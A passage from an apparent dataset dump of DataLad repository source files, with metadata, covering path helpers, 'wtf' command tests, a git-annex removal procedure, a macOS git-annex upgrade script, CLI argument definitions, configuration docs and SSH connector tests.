getattr(f, '__doc__', None)\n # adjust only if __doc__ is not completely absent (None)\n if doc is not None:\n wrapped.__doc__ = doc + \\\n \"\\n\\nThis wrapper around original function would encode forcefully \" \\\n \"to utf-8 if initial invocation fails\"\n return wrapped\n\n\nabspath = op.abspath\nbasename = op.basename\ncurdir = op.curdir\ndirname = op.dirname\nexists = _get_unicode_robust_version(op.exists)\nisdir = _get_unicode_robust_version(op.isdir)\nisabs = _get_unicode_robust_version(op.isabs)\njoin = op.join\nlexists = _get_unicode_robust_version(op.lexists)\nnormpath = op.normpath\npardir = op.pardir\npathsep = op.pathsep\nrelpath = op.relpath\nrealpath = _get_unicode_robust_version(op.realpath)\nsep = op.sep\n\n\ndef robust_abspath(p: str | Path) -> str:\n \"\"\"A helper which would not fail if p is relative and we are in non-existing directory\n\n It will rely on getpwd, which would rely on $PWD env variable to report\n the path. Desired for improved resilience during e.g. reporting as in\n https://github.com/datalad/datalad/issues/2787\n \"\"\"\n try:\n return abspath(p)\n except OSError:\n if not isabs(p):\n try:\n os.getcwd()\n except Exception:\n return normpath(join(getpwd(), p))\n # if no exception raised it was not the reason, raise original\n raise\n\n\ndef split_ext(filename: str) -> tuple[str, str]:\n \"\"\"Use git-annex's splitShortExtensions rule for splitting extensions.\n\n Parameters\n ----------\n filename : str\n\n Returns\n -------\n A tuple with (root, extension)\n\n Examples\n --------\n >>> from datalad.local.addurls import split_ext\n >>> split_ext(\"filename.py\")\n ('filename', '.py')\n\n >>> split_ext(\"filename.tar.gz\")\n ('filename', '.tar.gz')\n\n >>> split_ext(\"filename.above4chars.ext\")\n ('filename.above4chars', '.ext')\n \"\"\"\n parts = filename.split(\".\")\n if len(parts) == 1:\n return filename, \"\"\n\n tail = list(dropwhile(lambda x: len(x) < 5,\n reversed(parts[1:])))\n\n file_parts = parts[:1] + tail[::-1]\n ext_parts = parts[1+len(tail):]\n return \".\".join(file_parts), \".\" + \".\".join(ext_parts)\n\n\ndef get_parent_paths(paths: list[str], parents: list[str], only_with_parents: bool = False, *, sep: str = '/') -> list[str]:\n \"\"\"Given a list of children paths, return their parent paths among parents\n or their own path if there is no known parent. A path is also considered its\n own parent (haven't you watched Predestination?) ;)\n\n All paths should be relative, not pointing outside (not starting\n with ../), and normalized (no // or dir/../dir and alike). Only minimal\n sanity checking of values is done. By default paths are considered to be\n POSIX. Use 'sep' kwarg to set to `os.sep` to provide OS specific handling.\n\n Accent is made on performance to avoid O(len(paths) * len(parents))\n runtime. ATM should be typically less than O(len(paths) * len(log(parents)))\n\n Initial intended use - for a list of paths in the repository\n to provide their paths as files/submodules known to that repository, to\n overcome difference in ls-tree and ls-files, where ls-files outputs nothing\n for paths within submodules.\n It is coded, so it could later be applied even whenever there are nested\n parents, e.g. parents = ['sub', 'sub/sub'] and then the \"deepest\" parent\n is selected\n\n Parameters\n ----------\n parents: list of str\n paths: list of str\n only_with_parents: bool, optional\n If set to True, return a list of only parent paths where that path had\n a parent\n sep: str, optional\n Path separator. By default - '/' and thus treating paths as POSIX.\n If you are processing OS-specific paths (for both `parents` and `paths`),\n specify `sep=os.sep`.\n\n Returns\n -------\n A list of paths (without duplicates), where some entries replaced with\n their \"parents\" without duplicates. So for 'a/b' and 'a/c' with a being\n among parents, there will be a single 'a'\n \"\"\"\n # Let's do an early check even though then we would skip the checks on paths\n # being relative etc\n if not parents:\n return [] if only_with_parents else paths\n\n # We will create a lookup for known parent lengths\n parent_set = set(parents) # O(log(len(parents))) lookup\n\n # Will be used in sanity checking that we got consistently used separators, i.e.\n # not mixing non-POSIX paths and POSIX parents\n asep = {'/': '\\\\', '\\\\': '/'}[sep]\n\n # rely on path[:n] be quick, and len(parent_lengths) << len(parent_set)\n # when len(parent_set) is large. We will also bail checking any parent of\n # the length if at that length path has no directory boundary ('/').\n #\n # Create mapping for each length of\n # parent path to list of parents with that length\n parent_lengths_map: dict[int, set[str]] = _defaultdict(set)\n for parent in parent_set:\n _get_parent_paths_check(parent, sep, asep)\n parent_lengths_map[len(parent)].add(parent)\n\n # Make it ordered in the descending order so we select the deepest/longest parent\n # and store them as sets for faster lookup.\n # Could be an ordered dict but no need\n parent_lengths = [(l, parent_lengths_map[l]) for l in sorted(parent_lengths_map, reverse=True)]\n\n res = []\n seen = set()\n\n for path in paths: # O(len(paths)) - unavoidable but could be parallelized!\n # Sanity check -- should not be too expensive\n _get_parent_paths_check(path, sep, asep)\n for parent_length, parents_ in parent_lengths: # O(len(parent_lengths))\n if (len(path) < parent_length) or (len(path) > parent_length and path[parent_length] != sep):\n continue # no directory deep enough\n candidate_parent = path[:parent_length]\n if candidate_parent in parents_: # O(log(len(parent_set))) but expected one less due to per length handling\n if candidate_parent not in seen:\n res.append(candidate_parent)\n seen.add(candidate_parent)\n break # it is!\n else: # no hits\n if not only_with_parents:\n if path not in seen:\n res.append(path)\n seen.add(path)\n\n return res\n\n\ndef get_filtered_paths_(paths: Iterable[str|Path], filter_paths: Iterable[str | Path],\n *, include_within_path: bool = False) \\\n -> Iterator[str]:\n \"\"\"Among paths (or Path objects) select the ones within filter_paths.\n\n All `paths` and `filter_paths` must be relative and POSIX.\n\n In case of `include_with_path=True`, if a `filter_path` points to some path\n under a `path` within `paths`, that path would be returned as well, e.g.\n `path` 'submod' would be returned if there is a `filter_path` 'submod/subsub/file'.\n\n Complexity is O(N*log(N)), where N is the largest of the lengths of `paths`\n or `filter_paths`.\n\n Yields\n ------\n paths, sorted (so order is not preserved), which reside under 'filter_paths' or\n path within 'filter_paths' is under that path.\n \"\"\"\n # do conversion and sanity checks, O(N)\n def _harmonize_paths(l: Iterable[str | Path]) -> list[tuple[str, ...]]:\n ps = []\n for p in l:\n pp = PurePosixPath(p)\n if pp.is_absolute():\n raise ValueError(f\"Got absolute path {p}, expected relative\")\n if pp.parts and pp.parts[0] == '..':\n raise ValueError(f\"Path {p} leads outside\")\n ps.append(pp.parts) # store parts\n return sorted(ps) # O(N * log(N))\n\n paths_parts = _harmonize_paths(paths)\n filter_paths_parts = _harmonize_paths(filter_paths)\n\n # we will pretty much \"scroll\" through sorted paths and filter_paths at the same time\n for path_parts in paths_parts:\n while filter_paths_parts:\n filter_path_parts = filter_paths_parts[0]\n l = min(len(path_parts), len(filter_path_parts))\n # if common part is \"greater\" in the path -- we can go to the next \"filter\"\n if filter_path_parts[:l] < path_parts[:l]:\n # get to the next one\n filter_paths_parts = filter_paths_parts[1:]\n else:\n break # otherwise -- consider this one!\n else:\n # no filter path left - the other paths cannot be the selected ones\n break\n if include_within_path:\n # if one identical or subpath of another one -- their parts match in the beginning\n # and we will just reuse that 'l'\n pass\n else:\n # if all components of the filter match, for that we also add len(path_parts) check below\n l = len(filter_path_parts)\n if len(path_parts) >= l and (path_parts[:l] == filter_path_parts[:l]):\n yield '/'.join(path_parts)\n\n\ndef _get_parent_paths_check(path: str, sep: str, asep: str) -> None:\n \"\"\"A little helper for get_parent_paths\"\"\"\n if isabs(path) or path.startswith(pardir + sep) or path.startswith(curdir + sep):\n raise ValueError(\"Expected relative within directory paths, got %r\" % path)\n if sep+sep in path:\n raise ValueError(f\"Expected normalized paths, got {path} containing '{sep+sep}'\")\n if asep in path:\n raise ValueError(f\"Expected paths with {sep} as separator, got {path} containing '{asep}'\")\n" }, { "alpha_fraction": 0.5830287337303162, "alphanum_fraction": 0.5865247249603271, "avg_line_length": 36.45833206176758, "blob_id": "983c98bd27a0ef54243d3cae8a35e7f279459a7c", "content_id": "82b1c02a5cd44ac967c26abea7cd5ca8b9458583", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6293, "license_type": "permissive", "max_line_length": 92, "num_lines": 168, "path": "/datalad/local/tests/test_wtf.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test wtf\"\"\"\n\n\nfrom os.path import join as opj\n\nfrom datalad import __version__\nfrom datalad.api import (\n create,\n wtf,\n)\nfrom datalad.local.wtf import (\n _HIDDEN,\n SECTION_CALLABLES,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n OBSCURE_FILENAME,\n SkipTest,\n assert_greater,\n assert_in,\n assert_not_in,\n chpwd,\n eq_,\n ok_startswith,\n skip_if_no_module,\n swallow_outputs,\n with_tree,\n)\nfrom datalad.utils import ensure_unicode\n\nfrom datalad.support.external_versions import external_versions\n\n\n@with_tree({OBSCURE_FILENAME: {}})\ndef test_wtf(topdir=None):\n path = opj(topdir, OBSCURE_FILENAME)\n # smoke test for now\n with swallow_outputs() as cmo:\n wtf(dataset=path, on_failure=\"ignore\")\n assert_not_in('## dataset', cmo.out)\n assert_in('## configuration', cmo.out)\n # Those sections get sensored out by default now\n assert_not_in('user.name: ', cmo.out)\n with chpwd(path):\n with swallow_outputs() as cmo:\n wtf()\n assert_not_in('## dataset', cmo.out)\n assert_in('## configuration', cmo.out)\n # now with a dataset\n ds = create(path)\n with swallow_outputs() as cmo:\n wtf(dataset=ds.path)\n assert_in('## configuration', cmo.out)\n assert_in('## dataset', cmo.out)\n assert_in(u'path: {}'.format(ds.path),\n ensure_unicode(cmo.out))\n assert_in('branches', cmo.out)\n assert_in(DEFAULT_BRANCH+'@', cmo.out)\n assert_in('git-annex@', cmo.out)\n\n # and if we run with all sensitive\n for sensitive in ('some', True):\n with swallow_outputs() as cmo:\n wtf(dataset=ds.path, sensitive=sensitive)\n # we fake those for tests anyways, but we do show cfg in this mode\n # and explicitly not showing them\n assert_in('user.name: %s' % _HIDDEN, cmo.out)\n\n with swallow_outputs() as cmo:\n wtf(dataset=ds.path, sensitive='all')\n assert_not_in(_HIDDEN, cmo.out) # all is shown\n assert_in('user.name: ', cmo.out)\n if external_versions['psutil']:\n # filesystems detail should be reported\n assert_in('max_pathlength:', cmo.out)\n else:\n assert_in(\"Hint: install psutil\", cmo.out)\n\n # Sections selection\n #\n # If we ask for no sections and there is no dataset\n with chpwd(path):\n with swallow_outputs() as cmo:\n wtf(sections=[])\n assert_not_in('## dataset', cmo.out)\n for s in SECTION_CALLABLES:\n assert_not_in('## %s' % s.lower(), cmo.out.lower())\n\n # ask for a selected set\n secs = ['git-annex', 'configuration']\n with chpwd(path):\n with swallow_outputs() as cmo:\n wtf(sections=secs)\n for s in SECTION_CALLABLES:\n (assert_in if s in secs else assert_not_in)(\n '## %s' % s.lower(), cmo.out.lower()\n )\n # order should match our desired one, not alphabetical\n # but because of https://github.com/datalad/datalad/issues/3915\n # alphanum is now desired\n assert cmo.out.index('## git-annex') > cmo.out.index('## configuration')\n\n # not achievable from cmdline is to pass an empty list of sections.\n with chpwd(path):\n with swallow_outputs() as cmo:\n wtf(sections=[])\n eq_(cmo.out.rstrip(), '# WTF')\n\n # and we could decorate it nicely for embedding e.g. into github issues\n with swallow_outputs() as cmo:\n wtf(sections=['dependencies'], decor='html_details')\n ok_startswith(cmo.out, '<details><summary>DataLad %s WTF' % __version__)\n assert_in('## dependencies', cmo.out)\n\n # short flavor\n with swallow_outputs() as cmo:\n wtf(flavor='short')\n assert_in(\"- datalad: version=%s\" % __version__, cmo.out)\n assert_in(\"- dependencies: \", cmo.out)\n eq_(len(cmo.out.splitlines()), 4) # #WTF, datalad, dependencies, trailing new line\n\n with swallow_outputs() as cmo:\n wtf(flavor='short', sections='*')\n assert_greater(len(cmo.out.splitlines()), 10) # many more\n\n # check that wtf of an unavailable section yields impossible result (#6712)\n res = wtf(sections=['murkie'], on_failure='ignore')\n eq_(res[0][\"status\"], \"impossible\")\n # and we do not get double WTF reporting, while still rendering other sections ok\n with swallow_outputs() as cmo:\n res = wtf(sections=['system', 'murkie', 'environment'], on_failure='ignore')\n assert cmo.out.count('# WTF') == 1 # report produced only ones\n # and we still have other sections requested before or after\n assert cmo.out.count('## system') == 1\n assert cmo.out.count('## environment') == 1\n eq_(res[0][\"status\"], \"impossible\")\n\n # should result only in '# WTF'\n skip_if_no_module('pyperclip')\n\n # verify that it works correctly in the env/platform\n import pyperclip\n with swallow_outputs() as cmo:\n try:\n pyperclip.copy(\"xxx\")\n pyperclip_works = pyperclip.paste().strip() == \"xxx\"\n wtf(dataset=ds.path, clipboard=True)\n except (AttributeError, pyperclip.PyperclipException) as exc:\n # AttributeError could come from pyperclip if no DISPLAY\n raise SkipTest(str(exc))\n assert_in(\"WTF information of length\", cmo.out)\n assert_not_in('user.name', cmo.out)\n if not pyperclip_works:\n # Some times does not throw but just fails to work\n raise SkipTest(\n \"Pyperclip seems to be not functioning here correctly\")\n assert_not_in('user.name', pyperclip.paste())\n assert_in(_HIDDEN, pyperclip.paste()) # by default no sensitive info\n assert_in(\"cmd:annex:\", pyperclip.paste()) # but the content is there\n" }, { "alpha_fraction": 0.656105637550354, "alphanum_fraction": 0.6574257612228394, "avg_line_length": 34.23255920410156, "blob_id": "f07d8257e3f7ec09c521d95a7b25ac33ee0a942b", "content_id": "a711c3a8cfed6330c84426fbef3bcfa8e564e414", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1515, "license_type": "permissive", "max_line_length": 112, "num_lines": 43, "path": "/datalad/resources/procedures/cfg_noannex.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Procedure to uninit Git-annex (if initialized), and create/save .noannex file to prevent annex initialization\n\nIf there are git-annex'ed files already, git annex uninit and this procedure will fail.\n\n\"\"\"\n\nfrom datalad import lgr\nfrom datalad.distribution.dataset import require_dataset\nfrom datalad.support.annexrepo import AnnexRepo\n\n\ndef no_annex(ds):\n ds = require_dataset(\n ds,\n check_installed=True,\n purpose='configuration')\n\n if isinstance(ds.repo, AnnexRepo):\n repo = ds.repo\n # TODO: if procedures can have options -- add --force handling/passing\n #\n # annex uninit unlocks files for which there is content (nice) but just proceeds\n # and leaves broken symlinks for files without content. For the current purpose\n # of this procedure we just prevent \"uninit\" of any annex with some files already\n # annexed.\n if any(repo.call_annex_items_(['whereis', '--all'])):\n raise RuntimeError(\"Annex has some annexed files, unsafe\")\n # remove annex\n repo.call_annex(['uninit'])\n\n noannex_file = ds.pathobj / \".noannex\"\n if not noannex_file.exists():\n lgr.info(\"Creating and committing a .noannex file\")\n noannex_file.touch()\n ds.save(noannex_file,\n message=\"Added .noannex to prevent accidental initialization of git-annex\",\n result_renderer='disabled')\n\n\nif __name__ == '__main__':\n import sys\n no_annex(sys.argv[1])\n" }, { "alpha_fraction": 0.6930860280990601, "alphanum_fraction": 0.7082630395889282, "avg_line_length": 28.649999618530273, "blob_id": "68b4edba306f6ac4501373c7f98981be39880456", "content_id": "bde8a24091803dfb7b27d8a745114fab60585040", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 593, "license_type": "permissive", "max_line_length": 93, "num_lines": 20, "path": "/tools/upgrade-annex-osx.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncurver=$(git annex version | awk '/version:/{print $3;}' | sed -e 's,-.*,,g')\nannexdir=/Applications/git-annex.app\ncurverdir=$annexdir.$curver\n\nrm -f git-annex.dmg\n# release\n# curl -O https://downloads.kitenet.net/git-annex/OSX/current/10.10_Yosemite/git-annex.dmg\n# daily build\ncurl -O https://downloads.kitenet.net/git-annex/autobuild/x86_64-apple-yosemite/git-annex.dmg\n\nhdiutil attach git-annex.dmg \n\nif [ ! -z \"$curver\" ] && [ ! -e \"$curverdir\" ]; then\n\tmv $annexdir $curverdir\nfi\n\nrsync -a /Volumes/git-annex/git-annex.app /Applications/\nhdiutil detach /Volumes/git-annex/\n" }, { "alpha_fraction": 0.5630457997322083, "alphanum_fraction": 0.5647311210632324, "avg_line_length": 42.80537033081055, "blob_id": "94906f6ccad7f556191ca7b21a68ab74894c31b5", "content_id": "eeae3436203d3e78030bf3e9ae1ed8eaad2b0a77", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6527, "license_type": "permissive", "max_line_length": 91, "num_lines": 149, "path": "/datalad/cli/common_args.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n__all__ = ['common_args']\n\nfrom .helpers import (\n HelpAction,\n LogLevelAction,\n)\nfrom datalad.interface.base import eval_params\nfrom datalad.utils import ensure_unicode\n\n\n_log_level_names = ['critical', 'error', 'warning', 'info', 'debug']\n\n# argument spec template\n#<name>=(\n# <id_as_positional>, <id_as_option>\n# {<ArgumentParser.add_arguments_kwargs>}\n#)\n\ncommon_args = dict(\n cfg_overrides=(\n ('-c',),\n dict(action='append',\n dest='cfg_overrides',\n metavar='(:name|name=value)',\n help=\"\"\"specify configuration setting overrides. They override any\n configuration read from a file. A configuration can also be\n unset temporarily by prefixing its name with a colon (':'), e.g. ':user.name'.\n Overrides specified here may be overridden themselves by\n configuration settings declared as environment variables.\n \"\"\")),\n change_path=(\n ('-C',),\n dict(action='append',\n dest='change_path',\n metavar='PATH',\n help=\"\"\"run as if datalad was started in <path> instead\n of the current working directory. When multiple -C options are given,\n each subsequent non-absolute -C <path> is interpreted relative to the\n preceding -C <path>. This option affects the interpretations of the\n path names in that they are made relative to the working directory\n caused by the -C option\"\"\")),\n cmd=(\n ('--cmd',),\n dict(dest='_',\n action='store_true',\n help=\"\"\"syntactical helper that can be used to end the list of\n global command line options before the subcommand label. Options\n taking an arbitrary number of arguments may require to be followed\n by a single --cmd in order to enable identification of the\n subcommand.\"\"\")),\n help=(\n ('-h', '--help', '--help-np'),\n dict(nargs=0, action=HelpAction,\n help=\"\"\"show this help message. --help-np forcefully disables\n the use of a pager for displaying the help message\"\"\")),\n log_level=(\n ('-l', '--log-level'),\n dict(action=LogLevelAction,\n choices=_log_level_names + [str(x) for x in range(1, 10)],\n metavar=\"LEVEL\",\n default='warning',\n help=\"\"\"set logging verbosity level. Choose among %s. Also you can\n specify an integer <10 to provide even more debugging\n information\"\"\" % ', '.join(_log_level_names))),\n # CLI analog of eval_params.on_failure. TODO: dedup\n on_failure=(\n ('--on-failure',),\n dict(dest='common_on_failure',\n # setting the default to None here has the following implications\n # - the global default is solely defined in\n # datalad.interface.common_opts.eval_params and is in-effect for\n # Python API and CLI\n # - this global default is written to each command Interface class\n # and can be overridden there on a per-command basis, with such\n # override being honored by both APIs\n # - the CLI continues to advertise the choices defined below as\n # the possible values for '--on-failure'\n # - the Python docstring reflects a possibly command-specific\n # default\n default=None,\n choices=['ignore', 'continue', 'stop'],\n help=\"\"\"when an operation fails: 'ignore' and continue with\n remaining operations, the error is logged but does not lead to a\n non-zero exit code of the command; 'continue' works like 'ignore',\n but an error causes a non-zero exit code; 'stop' halts on first\n failure and yields non-zero exit code. A failure is any result\n with status 'impossible' or 'error'. [Default: '%s', but\n individual commands may define an alternative default]\"\"\"\n % eval_params['on_failure'].cmd_kwargs['default'])),\n report_status=(\n ('--report-status',),\n dict(dest='common_report_status',\n choices=['success', 'failure', 'ok', 'notneeded', 'impossible',\n 'error'],\n help=\"\"\"constrain command result report to records matching the\n given status. 'success' is a synonym for 'ok' OR 'notneeded',\n 'failure' stands for 'impossible' OR 'error'.\"\"\")),\n report_type=(\n ('--report-type',),\n dict(dest='common_report_type',\n choices=['dataset', 'file'],\n action='append',\n help=\"\"\"constrain command result report to records matching the\n given type. Can be given more than once to match multiple types.\n \"\"\")),\n # CLI analog of eval_params.result_renderer but with `<template>` handling\n # and a different default: in Python API we have None as default and do not\n # render the results but return them. In CLI we default to \"default\"\n # renderer\n result_renderer=(\n # this should really have --result-renderer for homogeneity with the\n # Python API, but adding it in addition makes the help output\n # monsterous\n ('-f', '--output-format'), # '--result-renderer',\n dict(dest='common_result_renderer',\n default='tailored',\n type=ensure_unicode,\n metavar=\"{generic,json,json_pp,tailored,disabled,'<template>'}\",\n help=eval_params['result_renderer']._doc \\\n + \" [Default: '%(default)s']\")),\n)\n\nif __debug__:\n common_args.update(\n dbg=(\n ('--dbg',),\n dict(action='store_true',\n dest='common_debug',\n help=\"enter Python debugger for an uncaught exception\",\n )),\n idbg=(\n ('--idbg',),\n dict(action='store_true',\n dest='common_idebug',\n help=\"enter IPython debugger for an uncaught exception\")),\n )\n" }, { "alpha_fraction": 0.5700280070304871, "alphanum_fraction": 0.5770308375358582, "avg_line_length": 41, "blob_id": "d4c2929d8ab2aa7d21f6a55448a69e5f80a02376", "content_id": "744b32eff65c3f56fa2381995f553e9a65a7f730", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "permissive", "max_line_length": 87, "num_lines": 17, "path": "/datalad/distribution/create_sibling_github.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Import shim to ease the transition after the move under distributed/\"\"\"\n\nimport warnings\nwarnings.warn(\n \"CreateSiblingGithub has been moved to \"\n \"datalad.distributed.create_sibling_github. Please adjust the import.\",\n DeprecationWarning)\n\nfrom datalad.distributed.create_sibling_github import CreateSiblingGithub\n" }, { "alpha_fraction": 0.744830846786499, "alphanum_fraction": 0.744830846786499, "avg_line_length": 36.33333206176758, "blob_id": "b6e0317980cee47568b173298a59e142c7590cb4", "content_id": "443d1e4504695723e12d7db3ebfd93d99cb147d9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2128, "license_type": "permissive", "max_line_length": 78, "num_lines": 57, "path": "/docs/source/config.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. _configuration:\n\nConfiguration\n*************\n\nDataLad uses the same configuration mechanism and syntax as Git itself.\nConsequently, datalad can be configured using the :command:`git config`\ncommand. Both a *global* user configuration (typically at\n:file:`~/.gitconfig`), and a *local* repository-specific configuration\n(:file:`.git/config`) are inspected.\n\nIn addition, datalad supports a persistent dataset-specific configuration.\nThis configuration is stored at :file:`.datalad/config` in any dataset. As it\nis part of a dataset, settings stored there will also be in effect for any\nconsumer of such a dataset. Both *global* and *local* settings on a particular\nmachine always override configuration shipped with a dataset.\n\nAll datalad-specific configuration variables are prefixed with ``datalad.``.\n\nIt is possible to override or amend the configuration using environment\nvariables. Any variable with a name that starts with ``DATALAD_`` will\nbe available as the corresponding ``datalad.`` configuration variable,\nreplacing any ``__`` (two underscores) with a hyphen, then any ``_``\n(single underscore) with a dot, and finally converting all letters to\nlower case. Values from environment variables take precedence over\nconfiguration file settings.\n\nIn addition, the ``DATALAD_CONFIG_OVERRIDES_JSON`` environment variable can\nbe set to a JSON record with configuration values. This is\nparticularly useful for options that aren't accessible through the\nnaming scheme described above (e.g., an option name that includes an\nunderscore).\n\nThe following sections provide a (non-exhaustive) list of settings honored\nby datalad. They are categorized according to the scope they are typically\nassociated with.\n\n\nGlobal user configuration\n=========================\n\n.. include:: generated/cfginfo/global.rst.in\n\nLocal repository configuration\n==============================\n\n.. include:: generated/cfginfo/local.rst.in\n\nSticky dataset configuration\n=============================\n\n.. include:: generated/cfginfo/dataset.rst.in\n\nMiscellaneous configuration\n===========================\n\n.. include:: generated/cfginfo/misc.rst.in\n" }, { "alpha_fraction": 0.6377817988395691, "alphanum_fraction": 0.6429244875907898, "avg_line_length": 34.57012176513672, "blob_id": "cdb0d436e46d1f18cab113f5477cd569f46ad5f8", "content_id": "aeb653730301c86b708e8587fd43fc05bf4b44dd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11667, "license_type": "permissive", "max_line_length": 87, "num_lines": 328, "path": "/datalad/support/tests/test_sshconnector.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test classes SSHConnection and SSHManager\n\n\"\"\"\n\nimport logging\nimport os.path as op\nfrom os.path import (\n exists,\n getmtime,\n isdir,\n)\nfrom os.path import join as opj\n\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_false,\n assert_in,\n assert_is_instance,\n assert_raises,\n eq_,\n get_most_obscure_supported_name,\n get_ssh_port,\n ok_,\n patch_config,\n skip_if_on_windows,\n skip_nomultiplex_ssh,\n skip_ssh,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import Path\n\nfrom ..sshconnector import (\n MultiplexSSHConnection,\n MultiplexSSHManager,\n NoMultiplexSSHConnection,\n SSHConnection,\n SSHManager,\n get_connection_hash,\n sh_quote,\n)\n\n# Some tests test the internals and assumptions of multiplex connections\n_ssh_manager_is_multiplex = SSHManager is MultiplexSSHManager\n\n\n@skip_ssh\ndef test_ssh_get_connection():\n\n manager = SSHManager()\n if _ssh_manager_is_multiplex:\n assert manager._socket_dir is None, \\\n \"Should be unset upon initialization. Got %s\" % str(manager._socket_dir)\n c1 = manager.get_connection('ssh://datalad-test')\n\n if _ssh_manager_is_multiplex:\n assert manager._socket_dir, \"Should be set after interactions with the manager\"\n assert_is_instance(c1, MultiplexSSHConnection)\n # subsequent call returns the very same instance:\n ok_(manager.get_connection('ssh://datalad-test') is c1)\n else:\n assert_is_instance(c1, NoMultiplexSSHConnection)\n\n # fail on malformed URls (meaning: our fancy URL parser can't correctly\n # deal with them):\n #assert_raises(ValueError, manager.get_connection, 'localhost')\n # we now allow those simple specifications of host to get_connection\n c2 = manager.get_connection('datalad-test')\n assert_is_instance(c2, SSHConnection)\n\n # but should fail if it looks like something else\n assert_raises(ValueError, manager.get_connection, 'datalad-test/')\n assert_raises(ValueError, manager.get_connection, ':datalad-test')\n\n # we can do what urlparse cannot\n # assert_raises(ValueError, manager.get_connection, 'someone@localhost')\n # next one is considered a proper url by urlparse (netloc:'',\n # path='/localhost), but eventually gets turned into SSHRI(hostname='ssh',\n # path='/localhost') -- which is fair IMHO -> invalid test\n # assert_raises(ValueError, manager.get_connection, 'ssh:/localhost')\n\n manager.close()\n\n\n@skip_if_on_windows\n@skip_ssh\n@with_tree(tree={'f0': 'f0', 'f1': 'f1'})\n@with_tempfile(suffix=get_most_obscure_supported_name(),\n content=\"1\")\ndef test_ssh_open_close(tmp_path=None, tfile1=None):\n\n manager = SSHManager()\n\n socket_path = None\n if _ssh_manager_is_multiplex:\n socket_path = opj(str(manager.socket_dir),\n get_connection_hash('datalad-test'))\n # TODO: facilitate the test when it didn't exist\n existed_before = exists(socket_path)\n\n c1 = manager.get_connection('ssh://datalad-test')\n c1.open()\n if socket_path:\n # control master exists for sure now\n ok_(exists(socket_path))\n\n # use connection to execute remote command:\n # we list explicitly local HOME since we override it in module_setup\n #\n # Note: Use realpath() below because we know that the resolved temporary\n # test directory exists on the target (many tests rely on that), but it\n # doesn't necessarily have the unresolved variant.\n out, err = c1('ls -a {}'.format(sh_quote(op.realpath(tmp_path))))\n remote_ls = [entry for entry in out.splitlines()\n if entry != '.' and entry != '..']\n eq_(set(remote_ls), {\"f0\", \"f1\"})\n if socket_path:\n ok_(exists(socket_path))\n\n # now test for arguments containing spaces and other pleasant symbols\n out, err = c1('ls -l {}'.format(sh_quote(tfile1)))\n assert_in(tfile1, out)\n # on a crippled FS it will actually say something like\n # Control socket connect(...6258b3a7): Connection refused\\r\\n'\n # but still work.\n #eq_(err, '')\n\n c1.close()\n if socket_path:\n # control master doesn't exist anymore:\n ok_(exists(socket_path) == existed_before)\n\n\n@skip_nomultiplex_ssh\ndef test_ssh_manager_close():\n\n manager = SSHManager()\n\n # check for previously existing sockets:\n existed_before_1 = exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test')))\n existed_before_2 = exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test2')))\n\n manager.get_connection('ssh://datalad-test').open()\n manager.get_connection('ssh://datalad-test2').open()\n\n if existed_before_1 and existed_before_2:\n # we need one connection to be closed and therefore being opened\n # by `manager`\n manager.get_connection('ssh://datalad-test').close()\n manager.get_connection('ssh://datalad-test').open()\n\n ok_(exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test'))))\n ok_(exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test2'))))\n\n manager.close()\n\n still_exists_1 = 